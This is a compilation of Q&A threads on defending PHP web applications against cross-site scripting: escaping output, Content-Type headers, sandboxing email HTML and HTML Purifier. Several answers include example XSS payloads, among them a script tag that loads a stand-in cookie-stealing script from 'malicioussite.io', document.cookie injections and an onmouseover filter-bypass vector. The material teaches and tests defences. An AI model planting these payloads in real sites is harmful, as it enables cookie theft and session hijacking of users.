I am thinking of secure ways to serve HTML and JSON to JavaScript. Currently I am just outputting the JSON like:
ajax.php?type=article&id=15
{
"name": "something",
"content": "some content"
}
but I do realize this is a security risk -- because the articles are created by users. So, someone could insert script tags (just an example) for the content and link to his article directly in the AJAX API. Thus, I am now wondering what's the best way to prevent such issues. One way would be to encode all non alphanumerical characters from the input, and then decode in JavaScript (and encode again when put in somewhere).
Another option could be to send some headers that force the browser to never render the response of the AJAX API requests (Content-Type and X-Content-Type-Options).
If you set the Content-Type to application/json then NO Browser will execute JavaScript on that page. This is apart of RFC-4627, and Google uses this to protect them selves. Other Application/ Content types follow similar rules.
You still have to worry about DOM Based XSS, however this would be a problem with your JavaScript, not really the content of the json. Another more exotic security concern with Json is information leakage like this vulnerability in gmail.
Make sure to always test your code. There is the Sitewatch free xss scanner, or the open source Skipfish and finally you could test this manually with a simple <script>alert(/xss/)</script>.
Instead of worrying about how you could encode the malicious code when you return it, you should probably take care that it does not even get into your database. A quick google search about preventing cross-site scripting and input validation might help you here. Cheers
If the user has to be logged in to view the web page then secure the ajax.php with the same authorization mechanism. Then a client that's not logged in cannot access ajax.php directly to retrieve the data.
I don't think your question is about validating user input, as others pointed out. You don't want to provide your JSON api to other people... right?
If this is the case then there isn't much you can do... in fact, even if you were serving HTML instead of JSON, people would still be doing HTML scraping to get what they wanted from your site (this is how Search Engine spiders work).
A good way to prevent scraping is to allow only a specific amount of downloads from an IP address. This way if someone is requesting http://yoursite.com/somejson.json more than 100 times a day, you probably know it's a scraper, and not someone visiting your page for 100 times in 1 day.
Insertion of script tags (or SQL) is only a problem if you fail to ensure it isn't at the point that it could be a problem.
A <script> tag in the middle of a comment that somebody submits will not hurt your server and it won't hurt your database. What it would hurt, if you fail to take appropriate measures, would be a page that includes the comment when you subsequently serve it up and it reaches a client browser. In order to prevent that from happening, your code that prepares the page must make sure that user-supplied content is always scrubbed before it is exposed to an unaware interpreter. In this case, that unaware interpreter is a client web browser. In fact, your client web browser really involves two unaware interpreters: the HTML parser & layout engine and the Javascript interpreter.
Another important example of an unaware interpreter is your database server. Note that a <script> tag is (almost certainly) harmless to your database, because "" doesn't mean anything in SQL. It's other sorts of input that cause problems for SQL, like quotes in strings (which are harmless to your HTML pages!).
Stackoverflow would be pretty lame if I couldn't put <script> tags in my answers, as I'm doing now. Same goes for examples of SQL Injection attacks. Recently somebody linked a page from some prominent US bank, where a big <textarea> was footnoted by a warning not to include the characters "<" or ">" in whatever you typed. Predictably, the bank was ridiculed over hundreds of Reddit comments, and rightly so.
Exactly how you "scrub" user-supplied content depends on the unaware interpreter to which you're delivering it. If it's going to be dropped in the middle of HTML markup, then you have to make sure that the "<", ">", and "&" characters are all encoded as HTML entitites. (You might want to do quote characters too, if the content might end up in an HTML element attribute value.) If the content is to be dropped into Javascript, however, you may not need to worry about HTML escaping, but you do need to worry about quotes, and possibly Unicode characters outside the 7-bit range.
For outputting safe html from php, I recommend http://htmlpurifier.org/
Related
What would be the recommended way to securely view emails in a browser (in PHP)?
Emails are highly insecure content and desktop email software obviously implements only a very limited subset of HTML and no javascript at all to prevent attacks. But if I'd take an email HTML source and display it in a browser, javascript code and other stuff would be executed.
I thought a solution would be to send a header like this along with the email source:
header("Content-Security-Policy: sandbox");
But this would prevent me from fetching inline images from the server as I still would need a PHP session id to be transmitted to understand that the user is allowed to fetch this content.
As there are many web email clients out there I wonder if there is a best practice model.
(FYI: I try to implement my own web email tool fitting to specific needs of a larger software suite)
You can address the issue of images by not requiring authentication and then making the URLs hard to guess (ex: <img src="/resources/SomeReallyLongHardToGuessRandomString">).
More broadly though, securely displaying user generated HTML is hard. Like really hard. This is a case where you should use a library. Keep in mind that you might have a user with a browser that is too old for the Content-Security-Policy header. This browser would happily run any scripts on the page. HTML Purifier is my personal choice, but there are others. Also, keep in mind that this is a dependency you will want to update often as people are constantly discovering new bugs.
As an additional line of defense, many sites use a seperate domain for user generated content. For example Google uses googleusercontent.com. That way if something does slip by, they haven't compromised the whole application. Note that this would still be bad, as an attacker might be able to read user content they shouldn't be able to (emails in this case).
I finally decided to modify the HTML source of the email (in my php script) to serve the inline images as base64 encoded data inside the HTML source. Therefore no additional loading of images is needed:
<img src="data:image/gif;base64,R0lGODlhDgE3APf/ALJUMt3W0aMyFPTixGRHOXNXSvnu3b1sSu7SpPLduurTxapEIvbly/bq4+bAffTo31Q1J/369dGafaAtDO3o5ePd2c6Tdfz6+a9...">
This will solve the current problem of displaying emails, because then I can stay my
header("Content-Security-Policy: sandbox");
because it is one major way to prevent attacks to be successful. Additionally, for enhanced security, I plan to look again into roundcubemail and see if I find out how they handle this problem and also use HTMLpurifier to further strip the email source from possible threats.
I'm reading about XSS to educate myself on security while working with PHP. I'm referring to this article, in which they talk about XSS and some of the rules that should be adhered to.
Could someone explain Rules #0 and #1 for me? I understand some of what they are saving, but when they say untrusted data do they mean data entered by the user?
I'm working on some forms and I'm trying to adhere to these rules to prevent XSS. The thing is, I never output anything to the user once the form is complete. All I do is process data and save it to text files. I've done some client-side and a lot of server-side validation, but I can't figure out what they mean by never insert untrusted data except in allowed locations.
By escaping do they mean closing tags - </>?
Rule #0 means that you should not output data in locations of your webpage, where it's expected to run instructions.
As shown on your url, do not put user generated data inside <script>tags. For example, this is a no-no:
<script>
var usernameSpanTag = document.getElementById('username');
usernameSpanTag.innerText = "Welcome back, "+<?=$username?>+"!";
</script>
Looks pretty safe, right? Well, what if your $username variable contains the following values:
""; console.log(document.cookie);//
So, on a website what you're going to display is going to be this:
<script>
var usernameSpanTag = document.getElementById('username');
usernameSpanTag.innerText = "Welcome back, "+""; console.log(document.cookie);//+"!";
</script>
So someone can easily steal your user's cookies and elevate their privileges. Now imagine that you're using similar code to say, update which user created the latest post, and shows up via AJAX. That's a disaster waiting to happen if you do something like above (and do not sanitize the username in the first place).
Same applies for <style>,<img>, <embed>, <iframe> or any other tag that lets you run scripts or import resources. Also applies to comments. Browsers ignore comments, but some interpreters like the JSP parser handles HTML comments as template text. It doesn't ignore its contents.
Rule #1 is pretty similar tu rule #0, if you're developing web applications at some point or another you will have to output user generated data, whether it is an email address, a username, a name, or whatever.
If you're developing a forum, probably you may want to give your users some styling options for their text. Basic stuff like bold letters, underlined and italics should suffice. If you want to get fancy, you may even let your users change the font.
An easy way to do it, without too many complications, is just letting users write their own HTML if they choose to do so, so if you output HTML from your users in "safe" locations like between <p> tags, then that's a disaster waiting to happen as well.
Because I can write:
Hey everybody, this is my first post <script src="//malicioussite.io/hackingYoCookiez.js"></script>!
If you don't escape that input, people will only see:
Hey everybody, this is my first post`!
but your browser will also see an external javascript that tells it to send everybody's cookies to a remote location.
So always escape the data. If you're using PHP you can use htmlentities or use a template engine like Twig, that automatically escapes the output for you.
Following on from a question I asked about escaping content when building a custom cms I wanted to find out how dangerous not escaping content from the db can be - assume the data ha been filtered/validated prior to insertion in the db.
I know it's a best practice to escape output but I'm just not sure how easy or even possible it is for someone to 'inject' a value into page content that is to be displayed.
For example let's assume this content with HTML markup is displayed using a simple echo statement:
<p>hello</p>
Admittedly it won't win any awards as far as content writing goes ;)
My question is can someone alter that for evil purposes assuming filtered/validated prior to db insertion?
Always escape for the appropriate context; it doesn't matter if it's JSON or XML/HTML or CSV or SQL (although you should be using placeholders for SQL and a library for JSON), etc.
Why? Because it's consistent. And being consistent is also a form of being lazy: you don't need to ponder if the data is "safe for HTML" because it shouldn't matter. And being lazy (in a good way) is a valuable programming trait. (In this case it's also being lazy about avoiding having to fix "bugs" due to changes in the future.)
Don't omit escaping "because it will never contain data that needs to be escaped" .. because, one day, over a course of a number of situations, that assumption will be wrong.
If you do not escape your HTML output, one could simply insert scripts into the HTML code of your page - running in the browser of every client that visits your page. It is called Cross-site scripting (XSS).
For example:
<p>hello</p><script>alert('I could run any other Javascript code here!');</script>
In the place of the alert(), you can use basically anything: access cookies, manipulate the DOM, communicate with other servers, et cetera.
Well, this is a very easy way of inserting scripts, and strip_tags can protect against this one. But there are hundreds of more sophisticated tricks, that strip_tags simply won't protect against.
If you really want to store and output HTML, HTMLPurifier could be your solution:
Hackers have a huge arsenal of XSS vectors hidden within the depths of
the HTML specification. HTML Purifier is effective because it
decomposes the whole document into tokens and removing non-whitelisted
elements, checking the well-formedness and nesting of tags, and
validating all attributes according to their RFCs. HTML Purifier's
comprehensive algorithms are complemented by a breadth of knowledge,
ensuring that richly formatted documents pass through unstripped.
It could be, for example, also problem linked with some other vulnerabilities like e.g. sql injection. Then someone would b e able to ommit filtering/validation prior adding to db and display whatever he can.
If you are pulling the word hello from the database and displaying it nothing will happen. If the content contains the <script> tags though then it is dangerous because a users cookies can be stolen then and used to hijack their session.
I have had issues with XSS. Specifically I had an individual inject JS alert showing that the my input had vulnerabilities. I have done research on XSS and found examples but for some reason I can't get them to work.
Can I get example(s) of XSS that I can throw into my input and when I output it back to the user see some sort of change like an alert to know it's vulnerable?
I'm using PHP and I am going to implement htmlspecialchars() but I first am trying to reproduce these vulnerabilities.
Thanks!
You can use this firefox addon:
XSS Me
XSS-Me is the Exploit-Me tool used to test for reflected Cross-Site
Scripting (XSS). It does NOT currently test for stored XSS.
The
tool works by submitting your HTML forms and substituting the form
value with strings that are representative of an XSS attack. If the
resulting HTML page sets a specific JavaScript value
(document.vulnerable=true) then the tool marks the page as vulnerable
to the given XSS string. The tool does not attempting to compromise
the security of the given system. It looks for possible entry points
for an attack against the system. There is no port scanning, packet
sniffing, password hacking or firewall attacks done by the
tool.
You can think of the work done by the tool as the same as the
QA testers for the site manually entering all of these strings into
the form fields.
For example:
<script>alert("XSS")</script>
"><b>Bold</b>
'><u>Underlined</u>
It is very good to use some of the automated tools, however you won't gain any insight or experience from those.
The point of XSS attack is to execute javascript in a browser window, which is not supplied by the site. So first you must have a look in what context the user supplied data is printed on the website; it might be within <script></script> code block, it might be within <style></style> block, it might be used as an attribute of an element <input type="text" value="USER DATA" /> or for instance in a <textarea>. Depending on that you will see what syntax you will use to escape the context (or use it); for instance if you are within <script> tags, it might be sufficient to close parethesis of a function and end the line with semicolon, so the final injection will look like ); alert(555);. If the data supplied is used as an html attribute, the injection might look like " onclick="alert(1)" which will cause js execution if you click on the element (this area is rich to play with especially with html5).
The point is, the context of the xss is as much important as any filtering/sanatizing functions that might be in place, and often there might be small nuances which the automated tool will not catch. As you can see above even without quotes and html tags, in a limited number of circumstance you might be able to bypass the filters and execute js.
There also needs to be considered the browser encoding, for instance you might be able to bypass filters if the target browser has utf7 encoding (and you encode your injection that way). Filter evasion is a whole another story, however the current PHP functions are pretty bulletproof, if used correctly.
Also here is a long enough list of XSS vectors
As a last thing, here is an actual example of a XSS string that was found on a site, and I guarantee you that not a single scanner would've found that (there were various filters and word blacklists, the page allowed to insert basic html formatting to customize your profile page):
<a href="Boom"><font color=a"onmouseover=alert(document.cookie);"> XSS-Try ME</span></font>
Ad-hoc testing is OK, however I also recommend trying a web application vulnerability scanning tool to ensure you haven't missed anything.
acunetix is pretty good and has a free trial of their application:
http://www.acunetix.com/websitesecurity/xss.htm
(Note I have no affiliation with this company, however I have used the product to test my own applications).
I have a form and as of right now, you can type any javascript, etc. you want. Any XSS, etc.
How do I go about creating a whitelist so you can only post characters.
At some point I would like anything that starts with http:// to be converted to
Thanks
Is this efficient?
http://htmlpurifier.org/
jQuery or Javascript is preferred
Well, no, you can't do that, you see? Because even if you 'sanitize' your data using javascript, noone's stopping anyone from
turning off javascript
using a browser's developer console to mess with the data
doing the POST directly, without a browser
In other words, you have to perform the validation/sanitization on the server side. Javascript validation is there to enhance the experience of your users (by providing instant feedback on invalid input, for example).
But still, in many high-load applications developers use partially client-side verifications (but all inputs have to be prepared for writing to db).
As you will be using PHP, i suggest you to parse your $_POST values with htmlspecialchars(), mysql_real_escape_string() and so on.
You will have to use regular expression to convert anything that starts with "http://" to links (well, you can also use explode('.', $_POST['yourInput']) which can be easier for you).